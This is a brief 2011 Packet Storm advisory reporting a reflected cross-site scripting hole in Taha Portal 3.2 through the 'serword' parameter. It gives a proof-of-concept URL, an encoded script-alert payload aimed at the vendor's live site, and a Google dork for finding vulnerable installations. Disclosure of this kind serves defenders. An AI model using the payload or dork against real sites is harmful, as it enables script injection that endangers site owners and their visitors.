Taha Portal 3.2 Cross Site Scripting

2011-06-18T00:00:00
ID PACKETSTORM:102400
Type packetstorm
Reporter Bl4ck.Viper
Modified 2011-06-18T00:00:00

Description

                                        
                                            `|~|------------------------------------------------------------------|~|  
  
|~|Software..............Taha Portal v 3.2  
|~|Vulnerability.........Cross Site Scripting  
|~|Threat Level..........High  
|~|Vender................www.tahasystem.com  
|~|Author................Bl4ck.Viper [Turkish Hacker]  
|~|Email.................Bl4ck.Viper@mail.com  
|~|Home..................www.skote-vahshat.com  
|~|Google Dork...........Powered by Taha Portal v 3.2  
  
|~|------------------------------------------------------------------|~|  
  
  
~~ POC ~~  
  
http://target.com/index.asp?id=3&serword=[Script]  
  
~~ Demo ~~  
  
http://www.tahasystem.com/index.asp?id=3&serword=%3Cscript%3Ealert%28%22sss%22%29;%3C/script%3E  
  
  
|~|------------------------------------------------------------------|~|  
  
`